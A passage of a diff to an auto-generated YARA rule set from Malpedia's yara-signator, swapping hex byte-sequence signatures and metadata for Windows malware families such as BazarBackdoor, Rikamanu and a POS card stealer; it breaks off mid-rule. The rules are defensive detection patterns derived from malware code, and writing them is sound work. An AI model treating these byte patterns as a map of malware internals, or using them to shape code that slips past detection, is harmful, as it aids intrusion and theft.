 		tool = "yara-signator v0.6.0"
@@ -100768,34 +100752,34 @@ rule MALPEDIA_Win_Stabuniq_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4510 8a4de0 8808 8b5510 83c201 }
-		$sequence_1 = { 8d95e4fcffff 52 8b4510 ff5030 6804010000 6a00 8d8dfcfeffff }
-		$sequence_2 = { 8b4510 50 8b4d08 ff5124 8945f4 6aff }
-		$sequence_3 = { ff92bc000000 6a00 6a00 6a25 8d85c0feffff 50 8b4d14 }
-		$sequence_4 = { 6a00 6a00 6a25 8d85c0feffff 50 8b4d14 81c1e8110000 }
-		$sequence_5 = { 69d2ff000000 8b4508 8d8c101f090000 51 8d95f8feffff }
-		$sequence_6 = { 8d8dc0fcffff 51 e8???????? 8b5508 83c220 895508 68ff000000 }
-		$sequence_7 = { 8b8d24fdffff 51 8b5510 ff520c 6a40 }
-		$sequence_8 = { 8b88f0010000 51 8b5510 ff92b8000000 }
-		$sequence_9 = { ff9098010000 8b4d20 83790800 7513 8b5520 }
+		$sequence_0 = { c7442404???????? 892c24 e8???????? 85c0 0f8efdfdffff 83bc240c010000ff 8b442450 }
+		$sequence_1 = { c744240491000000 c7042422000000 e8???????? 8b4508 c7442414cb2d5900 89442418 8b4504 }
+		$sequence_2 = { c7442404???????? 891424 894c2448 e8???????? 85c0 8944243c 8b4c2448 }
+		$sequence_3 = { e8???????? 8d8d4832fcff e8???????? 8b85e02afcff 890424 e8???????? 8b85dc2afcff }
+		$sequence_4 = { 89442434 83c420 5b 5e 5f e9???????? c74424109d000000 }
+		$sequence_5 = { c1ff1f c1fa02 89d3 bad34d6210 f7ea 29fb c1fa06 }
+		$sequence_6 = { 8d842480000000 890424 e8???????? 81c42c020000 31c0 5b 5e }
+		$sequence_7 = { 89442404 8b442420 8b4010 8b4014 83c014 890424 e8???????? }
+		$sequence_8 = { 893c24 e8???????? 8b442420 85c0 0f95442427 ebd0 8b460c }
+		$sequence_9 = { e8???????? 8b442434 c744240400000000 890424 e8???????? 8b842494000000 893424 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 4489216
 }
-rule MALPEDIA_Win_Avzhan_Auto : FILE
+rule MALPEDIA_Win_Rikamanu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c13a7c9b-4cee-5226-bade-6ae0e888daa7"
+		id = "308aa7df-176c-53f5-8487-211055f7d5b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avzhan_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rikamanu_auto.yar#L1-L282"
 		license_url = "N/A"
-		logic_hash = "71cd3a78708c6b20dbe933c0b73634c73ab7a935896c5127cd1ee325ea10e744"
+		logic_hash = "d4697a7a9a9db5141a7716ea23027d53a2dc30b33c7526980666f737aa001510"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100807,32 +100791,52 @@ rule MALPEDIA_Win_Avzhan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88442418 c644241906 51 66895c241e }
-		$sequence_1 = { 83c418 0bc6 8944244c 66c74424500000 3935???????? }
-		$sequence_2 = { 0f85bc000000 8d84247c010000 50 e8???????? 8d8c24e8000000 }
-		$sequence_3 = { 68d0070000 ffd7 6a00 8b542414 52 }
-		$sequence_4 = { 8d7c243c c744243844000000 f3ab 8b442464 8b3d???????? }
-		$sequence_5 = { 83c418 0bc6 8944244c 66c74424500000 3935???????? 743c }
-		$sequence_6 = { ff15???????? 8b2d???????? 8b1d???????? b910000000 33c0 }
-		$sequence_7 = { 8bf0 8dbc2404020000 83c9ff 33c0 83c408 f2ae }
-		$sequence_8 = { ffd7 6a00 8b542414 52 ffd3 }
-		$sequence_9 = { 33c0 8d7c243c c744243844000000 f3ab 8b442464 8b3d???????? 83c418 }
+		$sequence_0 = { e8???????? 6a14 ff15???????? a801 }
+		$sequence_1 = { 50 ff15???????? 8b35???????? 3d80969800 }
+		$sequence_2 = { 33c0 663bcb 0f95c0 a3???????? }
+		$sequence_3 = { 80c120 888820ad4000 eb1f 83f861 7213 83f87a 770e }
+		$sequence_4 = { 59 50 8d85e8faffff 50 ff35???????? }
+		$sequence_5 = { 85f6 7419 0fb6da f683a1a7400004 }
+		$sequence_6 = { c3 0fb6442404 8a4c240c 8488a1a74000 751c 837c240800 }
+		$sequence_7 = { 8d8de4fdffff 51 e8???????? 8b8de4fdffff 8b35???????? 8d95ccfdffff }
+		$sequence_8 = { 8d74242c b8???????? 8a10 8aca 3a16 751c 3acb }
+		$sequence_9 = { 8b7d0c 85db 0f84b2000000 85ff 0f84aa000000 8d85a4fdffff }
+		$sequence_10 = { 8bc3 8bcb c1f805 83e11f 8b0485e0b84000 }
+		$sequence_11 = { 85c0 7457 68???????? 56 ffd5 }
+		$sequence_12 = { 6810270000 ff15???????? 8b85e4fdffff 8d8dccfdffff 51 8d9588fdffff 52 }
+		$sequence_13 = { 5d c20800 8b55e8 6a00 }
+		$sequence_14 = { 888808972400 40 ebe6 ff35???????? ff15???????? 85c0 }
+		$sequence_15 = { 8dbc2430010000 83c9ff f2ae f7d1 2bf9 8bf7 }
+		$sequence_16 = { ffd3 55 55 8d4c2444 55 }
+		$sequence_17 = { ff15???????? a3???????? 3bc3 7530 }
+		$sequence_18 = { 8b35???????? 68???????? ffd6 8be8 83fdff 750b }
+		$sequence_19 = { 6a00 68???????? 8b442418 6a03 }
+		$sequence_20 = { 0fb6da f683a1a7400004 7406 8816 }
+		$sequence_21 = { 7373 8bc8 8bf0 c1f905 83e61f 8d3c8de0b84000 c1e603 }
+		$sequence_22 = { 8a8160204100 8802 5b 5d c3 }
+		$sequence_23 = { a1???????? 0f45c6 a3???????? ebcf 83f802 }
+		$sequence_24 = { 50 53 6800130000 ff15???????? 5b }
+		$sequence_25 = { f682a1a7400004 740c ff01 85f6 }
+		$sequence_26 = { 52 6a01 53 53 e8???????? 8b95e0fdffff }
+		$sequence_27 = { 7410 8088????????20 8a9405ecfcffff ebe3 80a020ad400000 40 }
+		$sequence_28 = { 68???????? e8???????? 8b3d???????? 59 59 85c0 751b }
+		$sequence_29 = { 8d8914982400 5a 668b31 668930 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Ismagent_Auto : FILE
+rule MALPEDIA_Win_Loup_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24afa0f1-f712-53a2-912d-b18acc3ca8ea"
+		id = "2089eb01-8adc-5d71-ab0c-e9de7e386d03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ismagent_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.loup_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "9ef409a40f890c9792a656e6f1a7b3222e5613b22517076da29bfdc0316f39e4"
+		logic_hash = "ecdd5b2ea3515331e17a7116f826dcace78b7e88cf24fcea19298195170a6a4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100846,30 +100850,32 @@ rule MALPEDIA_Win_Ismagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89442448 8bf0 83c404 2bf2 }
-		$sequence_1 = { 2bce 3bd1 72e2 83ff04 750a }
-		$sequence_2 = { 5d c3 8b85b8f3ffff 33db 899dc0f3ffff c60000 85c9 }
-		$sequence_3 = { 8d4901 88840c1f130000 84c0 75ec 33c9 8a840c380f0000 }
-		$sequence_4 = { 8d5201 888c14ff060000 84c9 75ec }
-		$sequence_5 = { 8b4c2434 8d942418070000 50 6a01 }
-		$sequence_6 = { 8dbc2428650000 2bd6 4f 0f1f8000000000 8a4701 }
-		$sequence_7 = { 8d8424580b0000 50 e8???????? 83c40c 8d842418030000 68e8030000 50 }
+		$sequence_0 = { 83c404 85c0 741c 0fb745f4 50 e8???????? }
+		$sequence_1 = { 81781422059319 740c 8b4dfc 81791400409901 7522 e8???????? 8b55fc }
+		$sequence_2 = { 85c0 0f84da000000 8b7dec 8b07 8b7068 }
+		$sequence_3 = { 8b85d0f1ffff 53 56 ff3485647b4100 50 }
+		$sequence_4 = { 68c0d40100 8d4de8 51 682e010000 0fb75508 52 e8???????? }
+		$sequence_5 = { 81f247656e75 b804000000 6bc803 8b440de0 35696e6549 }
+		$sequence_6 = { 8b4df4 84c0 0f84defeffff c745dc01000000 e9???????? 5f 5e }
+		$sequence_7 = { 668945e8 33c0 668945ea c745ee01000000 b804000000 668945ec }
+		$sequence_8 = { b804000000 c1e002 c784055cffffff01000000 8d855cffffff 8945d5 }
+		$sequence_9 = { 8915???????? c705????????01000000 a1???????? 83c802 a3???????? b904000000 c1e100 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 257024
 }
-rule MALPEDIA_Win_Breach_Rat_Auto : FILE
+rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5b42a75-e77a-5ca6-b3c1-cb4ca403dd4b"
+		id = "6545d5ce-704c-5c00-a6cd-ec1b5c909576"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.breach_rat_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mosaic_regressor_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "6d11bf02b16d797b6e97c762d9594bbc3acc80831e5eb5fa56307a891b9803ec"
+		logic_hash = "73c7fd14f8effd7ac9e0816b586de74eff8d0d21c8391e8e84f2921e57196fdb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100879,36 +100885,36 @@ rule MALPEDIA_Win_Breach_Rat_Auto : FILE
 		malpedia_rule_date = "20241030"
 		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
 		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { c7840548ffffffe4024400 8b8548ffffff 8b4804 8d41a0 89840d44ffffff 8d8d4cffffff e8???????? }
-		$sequence_1 = { 68???????? 8d855cfbffff c745fc65000000 50 8bce e8???????? }
-		$sequence_2 = { e8???????? c1e008 8bce 03f8 e8???????? c1e010 8bce }
-		$sequence_3 = { 8b0e 894654 e8???????? 8b06 83781000 7514 33c0 }
-		$sequence_4 = { 5d c3 837e1000 0f85f4feffff c74720ffffffff 33c0 }
-		$sequence_5 = { c6459800 e8???????? 68???????? 6a01 8d4598 c745fc00000000 50 }
-		$sequence_6 = { ff75ac e8???????? 83c404 8b7d80 8d856cffffff ffb57cffffff 8bb56cffffff }
-		$sequence_7 = { c7465800000000 e8???????? 894654 c645fc04 c7465c00000000 c7466000000000 e8???????? }
-		$sequence_8 = { 66d3ef 8b4de4 83c1f0 6689b8b0160000 0188b4160000 eb19 668b90b40a0000 }
-		$sequence_9 = { 7408 83c002 49 75f5 33c0 85c0 7453 }
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { e8???????? 670010 386700 1023 d18a0688078a }
+		$sequence_1 = { 8975e0 8db1d0a70010 8975e4 eb2a }
+		$sequence_2 = { 85c0 7456 8b4de0 8d0c8de0b70010 8901 8305????????20 }
+		$sequence_3 = { f3a4 6a1c 8d8c2480060000 51 6a00 ffd5 8d842478060000 }
+		$sequence_4 = { 8d442460 50 6a00 ffd5 8d442458 48 8d4900 }
+		$sequence_5 = { 895008 8d542458 52 88480c }
+		$sequence_6 = { c744241444000000 8bc8 90 8a10 }
+		$sequence_7 = { 6a06 89430c 8d4310 8d89c4a70010 5a }
+		$sequence_8 = { 8bff 55 8bec 8b4508 ff34c578a10010 ff15???????? 5d }
+		$sequence_9 = { 6a00 6a00 6a00 8d942498080000 }
 
 	condition:
-		7 of them and filesize < 645120
+		7 of them and filesize < 113664
 }
-rule MALPEDIA_Win_Poscardstealer_Auto : FILE
+rule MALPEDIA_Win_Donot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5940fce6-5171-52a7-adbd-1bfc9feaf26a"
+		id = "0d8c8de4-b5bc-5e41-9f0a-3ce84556a33b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poscardstealer_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.donot_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "45ecc712be3203f41628cc2ab4db40cb265e98700000888fd4a766a5ab62d728"
+		logic_hash = "c988e567c68890dfe0605ba69d12ded06e141c854ed633d34ee6899ee2b466e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100922,32 +100928,32 @@ rule MALPEDIA_Win_Poscardstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85f4fdffff 50 57 e8???????? 33c9 8d85f4fdffff c785ecedffff07000000 }
-		$sequence_1 = { 56 8d45d4 50 8d4db8 e8???????? 6a01 }
-		$sequence_2 = { c645fc00 3bf7 7409 56 e8???????? }
-		$sequence_3 = { e8???????? 83c404 8b45d4 397de8 7303 8d45d4 8b4de4 }
-		$sequence_4 = { 8bb580edffff 2bb57cedffff c1fe02 3bfe 7426 8b857cedffff 8d14b500000000 }
-		$sequence_5 = { 837d1c10 c745e80f000000 c745e400000000 c645d400 720c 8b4d08 51 }
-		$sequence_6 = { 89430c 8d4310 8d896c614200 5a 668b31 668930 }
-		$sequence_7 = { 8d8d48ffffff e8???????? 898544ffffff 83f8ff 746f 6aff 50 }
-		$sequence_8 = { 66898dd8edffff 837e1408 731c 8b5610 }
-		$sequence_9 = { e8???????? 6a01 53 68???????? 8d4d9c c645fc03 e8???????? }
+		$sequence_0 = { c7461407000000 668906 8b95ccfcffff 83fa08 7235 }
+		$sequence_1 = { 52 50 8b08 ff511c 6a0c e8???????? }
+		$sequence_2 = { 83fa08 7231 8b8dc8fdffff 8d145502000000 8bc1 81fa00100000 7210 }
+		$sequence_3 = { 8b06 8b4004 c70406???????? 8b06 8b5004 8d4290 }
+		$sequence_4 = { 8d8d68fdffff 6a20 ffb5c0fdffff 33c0 c78568fdffff00000000 c78578fdffff00000000 }
+		$sequence_5 = { 8b49fc 83c223 2bc1 83c0fc 83f81f 0f87b4150000 52 }
+		$sequence_6 = { 83f8ff 7507 33f6 e9???????? 6a00 50 }
+		$sequence_7 = { 50 e8???????? 8bb5e4e7ffff 8bc6 8b95e0e7ffff 2bc2 83f801 }
+		$sequence_8 = { e9???????? 833d????????00 0f858cc60000 8d0d50990310 ba1d000000 e8???????? 5a }
+		$sequence_9 = { 50 8d45f4 64a300000000 8b01 8d7968 8b4004 c744389878210410 }
 
 	condition:
-		7 of them and filesize < 362496
+		7 of them and filesize < 626688
 }
-rule MALPEDIA_Win_Onhat_Auto : FILE
+rule MALPEDIA_Win_T34Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4885dade-4fce-5e20-9ffa-fd32e752e39c"
+		id = "284a2fef-7ae8-56b0-9c93-6269ff81a414"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.onhat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.t34loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.t34loader_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "3d8264647f2b4bfebfbb64b6330e4d7098e25f3b002acba0b19c8992974ae5d6"
+		logic_hash = "f0b1763253e4022aabc3df13d81fa3a04dd6aace513ad41ab61bf012fd6fd102"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100961,34 +100967,34 @@ rule MALPEDIA_Win_Onhat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f842b010000 6888130000 8d8c2424010000 6a10 51 }
-		$sequence_1 = { 50 c68424d90000004e c68424da00000054 c68424db00000041 c68424dc00000048 889c24dd000000 c68424de00000045 }
-		$sequence_2 = { 66894c2412 e8???????? 83f8ff 0f85a7000000 b04e b243 }
-		$sequence_3 = { 33c9 8a4c2426 52 c1e818 }
-		$sequence_4 = { c68424ca0000004f c68424cc00000070 c68424ce00000050 c68424d000000073 c68424d200000074 c68424d400000000 }
-		$sequence_5 = { 51 8b4c2458 50 52 51 }
-		$sequence_6 = { ffd6 8b2d???????? 8d842494000000 50 }
-		$sequence_7 = { 890d???????? 5b c3 8b048e 8a10 }
-		$sequence_8 = { 6a00 57 c744241c01000000 e8???????? 85c0 }
-		$sequence_9 = { 8b542440 52 8b542428 50 8b442464 50 }
+		$sequence_0 = { 488d0d13700400 807b5704 7704 488b4b48 4c8bc6 33d2 e8???????? }
+		$sequence_1 = { cd29 488d0deaba0400 e8???????? 488b442438 488905???????? 488d442438 }
+		$sequence_2 = { 4c897610 488bd5 e8???????? 498d0c36 eb59 498bd6 e8???????? }
+		$sequence_3 = { 448b45fc 4803cb e8???????? 0fb74706 488d6d28 ffc6 }
+		$sequence_4 = { 488bd9 4885d2 7504 33c0 eb10 4883c128 e8???????? }
+		$sequence_5 = { 0f84f4000000 498b01 488903 40886b10 e9???????? }
+		$sequence_6 = { 4533c0 410fb717 488bcd 488b4070 ff15???????? 3c3a 0f8581000000 }
+		$sequence_7 = { 0f8590090000 4883fb03 0f8486090000 458af1 488bd6 488bcf e8???????? }
+		$sequence_8 = { 448bcb ba02100000 498bce ff15???????? 85c0 7508 ff15???????? }
+		$sequence_9 = { 4533c0 4889442420 ff15???????? 488d542450 488d4c2430 e8???????? 488d9580070000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 1212416
 }
-rule MALPEDIA_Win_Kuluoz_Auto : FILE
+rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "23b3e89b-1b7f-51fe-9c49-dededa4af110"
+		id = "a043fe1e-731d-5a9e-9fb9-7f9cee445985"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kuluoz_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bazarbackdoor_auto.yar#L1-L596"
 		license_url = "N/A"
-		logic_hash = "e3270208208f4df1bb5bfe1d5ec8560fd50de417e7279c3823b68456c3f49c76"
+		logic_hash = "fa8de6b24d77371b268d10b4378b94df76c1989be3511c0a0f6cfa11ec9c195b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -101000,32 +101006,94 @@ rule MALPEDIA_Win_Kuluoz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0355ec 8955f8 8b45fc 0345ec }
-		$sequence_1 = { 8b45f0 50 e8???????? 8945f4 837df4ff 7405 8b45f4 }
-		$sequence_2 = { 68???????? 8d4df4 51 e8???????? 0fb6d0 85d2 740f }
-		$sequence_3 = { 2b45fc 894510 8b4d0c 034dfc }
-		$sequence_4 = { 8d45fc 50 6a00 6a00 68???????? ff15???????? 8b45fc }
-		$sequence_5 = { 83c202 52 ff15???????? 8945ec 837dec00 740f 8b45ec }
-		$sequence_6 = { 8b55f0 0fb602 50 e8???????? 8945fc }
-		$sequence_7 = { 8b4d10 8b91fe010000 8b4510 8b4df4 8a09 }
-		$sequence_8 = { 894594 8b4d8c 894df4 8b5590 8955f8 8b4594 }
-		$sequence_9 = { b900100000 f7f1 8b45fc 2bc2 }
+		$sequence_0 = { ff15???????? 85c0 780a 4898 }
+		$sequence_1 = { 41b80f100000 488bce 4889442420 ff15???????? }
+		$sequence_2 = { e8???????? 4885c0 740a 488bcf ffd0 }
+		$sequence_3 = { 488d4d80 e8???????? 498bd6 488d4d80 }
+		$sequence_4 = { 0fb70f ff15???????? 0fb74f02 0fb7d8 }
+		$sequence_5 = { 0fb74f02 0fb7d8 ff15???????? 0fb74f08 }
+		$sequence_6 = { 7507 33c0 e9???????? b8ff000000 }
+		$sequence_7 = { ff15???????? 0fb74f08 440fb7e8 ff15???????? }
+		$sequence_8 = { c3 0fb74c0818 b80b010000 663bc8 }
+		$sequence_9 = { cc e8???????? cc 4053 4883ec20 b902000000 }
+		$sequence_10 = { 4885c9 7406 488b11 ff5210 ff15???????? }
+		$sequence_11 = { e8???????? 4c89e1 e8???????? 8b05???????? }
+		$sequence_12 = { 4889f1 e8???????? 8b05???????? 8b0d???????? }
+		$sequence_13 = { 48c1e108 4803c8 8bc1 488d94059f070000 }
+		$sequence_14 = { ff15???????? ff15???????? 4d8bc5 33d2 }
+		$sequence_15 = { e8???????? 4889c7 8b05???????? 8b0d???????? }
+		$sequence_16 = { 31ff 4889c1 31d2 4989f0 }
+		$sequence_17 = { ff15???????? 4889c1 31d2 4d89e0 }
+		$sequence_18 = { 488d95a0070000 488d442470 41b80f100000 488bce }
+		$sequence_19 = { 4c89742440 4c89742438 4489742430 4c89742428 }
+		$sequence_20 = { 418d5508 488bc8 ff15???????? 488bd8 4885c0 }
+		$sequence_21 = { 488d9590050000 488bce ff15???????? 85c0 }
+		$sequence_22 = { 4533c9 4889442428 488d95a0070000 488d442470 }
+		$sequence_23 = { 4889c1 31d2 4989f8 41ffd6 }
+		$sequence_24 = { 488bd3 e8???????? ff15???????? 4c8bc3 33d2 488bc8 }
+		$sequence_25 = { 85c8 0f94c0 833d????????0a 0f9cc1 84c1 7508 30c1 }
+		$sequence_26 = { c744242800000001 4533c9 4533c0 c744242002000000 }
+		$sequence_27 = { c744242880000000 c744242003000000 4889f9 ba00000080 41b801000000 }
+		$sequence_28 = { 0fb65305 33c0 80f973 0f94c0 }
+		$sequence_29 = { 08c1 80f101 7502 ebfe }
+		$sequence_30 = { 08ca 80f201 7502 ebfe }
+		$sequence_31 = { 0f9fc1 38d3 7507 08c1 80f101 744d }
+		$sequence_32 = { 89d1 83f1fe 85d1 0f95c2 833d????????09 0f9fc1 89cb }
+		$sequence_33 = { ff15???????? 488bf8 4885c0 7533 }
+		$sequence_34 = { 89c1 83f1fe 85c1 0f94c0 }
+		$sequence_35 = { 89d1 83f1fe 85d1 0f94c2 833d????????0a 0f9cc1 89cb }
+		$sequence_36 = { ff15???????? 31ed 4889c1 31d2 }
+		$sequence_37 = { 0fb64b04 0fb6d1 80f973 7504 0fb65305 33c0 }
+		$sequence_38 = { 0f9fc1 83fa0a 0f9cc2 30da 7512 08c1 80f101 }
+		$sequence_39 = { 4889c1 31d2 4989e8 ff15???????? }
+		$sequence_40 = { 4889c1 31d2 4d89f8 ffd3 }
+		$sequence_41 = { e8???????? 4c897c2420 4889d9 89fa }
+		$sequence_42 = { 7405 80fa2e 750f 0fb6c1 }
+		$sequence_43 = { 488d4c2428 e8???????? 4889f1 4889c2 }
+		$sequence_44 = { c744242880000000 c744242003000000 4889f1 ba00000080 }
+		$sequence_45 = { 4889fa 4189f0 4d89f1 ffd0 }
+		$sequence_46 = { 6689442470 8d4833 ff15???????? c744242810000000 }
+		$sequence_47 = { 33d2 6a09 68fe6a7a69 42 e8???????? }
+		$sequence_48 = { 7506 8b0e 894c2460 0fb7c0 }
+		$sequence_49 = { 7512 83fe40 730d 896c846c 8b742468 46 }
+		$sequence_50 = { 0fb745e8 50 68???????? e8???????? }
+		$sequence_51 = { 50 e8???????? 83c404 33c0 33d2 40 8bc8 }
+		$sequence_52 = { 66890d???????? 0fb7ca ff15???????? b901000000 66c746020100 }
+		$sequence_53 = { 75ef 21542440 6890010000 686a72995d 6a04 }
+		$sequence_54 = { 51 8bd6 e8???????? 59 59 85c0 }
+		$sequence_55 = { 33ff 32db 885c2410 c70601000000 eb35 81ffff030000 }
+		$sequence_56 = { 6a01 6a04 68???????? ff15???????? 8bf8 83ffff }
+		$sequence_57 = { 81feff030000 733c 8a02 3cc0 721e }
+		$sequence_58 = { 88041a 8bd1 41 3bcf }
+		$sequence_59 = { 0fb6c9 51 8bca c1f910 0fb6c1 50 8bc2 }
+		$sequence_60 = { 2ac2 fec8 88041a 8bd1 }
+		$sequence_61 = { 3cc0 721e 0fb6c8 0fb64201 }
+		$sequence_62 = { 8d7001 8d4610 50 6a08 }
+		$sequence_63 = { 0fb70d???????? 83c40c 8d4101 51 66a3???????? }
+		$sequence_64 = { 89442438 4863442430 486bc010 488d0de3380200 4803c8 488bc1 }
+		$sequence_65 = { 7460 488b442430 488b00 8b4028 488b4c2440 4803c8 488bc1 }
+		$sequence_66 = { 4c8d052a200000 488b542428 488d4c2420 e8???????? 4889442430 ff542430 }
+		$sequence_67 = { 48894c2408 4883ec48 8b442458 89442424 48c744242800000000 41b800100200 }
+		$sequence_68 = { 0f848c000000 488b442430 83782000 7460 488b442430 }
+		$sequence_69 = { 4533c0 ba01000000 488b4c2440 ff9424a0000000 89842480000000 }
+		$sequence_70 = { 488b442430 488b00 83782800 0f848c000000 488b442430 }
+		$sequence_71 = { 488d0de3380200 4803c8 488bc1 48634c2434 488d04c8 48634c2438 8b0488 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 2088960
 }
-rule MALPEDIA_Win_Nullmixer_Auto : FILE
+rule MALPEDIA_Win_Xdspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b38b3d85-051a-5533-80ac-2c20e10e6e40"
+		id = "e9ae860f-a2c7-565f-9217-a440882548d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nullmixer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xdspy_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "bed10b9aa89a73eeb2144099fe0c5f1e459e50018915c4280b459d1a0374a95d"
+		logic_hash = "1f709444cf724d3961e54f18b66ae4023548e4088934cac26da730f0bde271d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101039,32 +101107,38 @@ rule MALPEDIA_Win_Nullmixer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0b45d0 0f8436ffffff 837db840 7475 89f0 8d7728 83c302 }
-		$sequence_1 = { 8b4508 8b7518 894db0 8d4dcf 8945bc 8b450c 8945b4 }
-		$sequence_2 = { 807dcf01 0f8447030000 8b4520 c70000000000 c7400400000000 8b451c c70004000000 }
-		$sequence_3 = { 0fb61c37 8d4508 e8???????? 38c3 0f851cfeffff 8b4d08 83c601 }
-		$sequence_4 = { 8b842498000000 895c2404 6631db 89442418 8b842494000000 89442414 8b842490000000 }
-		$sequence_5 = { 89ce 0f85a8080000 38d0 0f845d080000 8b4d08 0fb7750c 85c9 }
-		$sequence_6 = { 83ec04 84c0 740a 8b8424c4000000 830802 0fb744247c 8b7c2478 }
-		$sequence_7 = { 55 57 56 53 8b442418 8b7904 8b74241c }
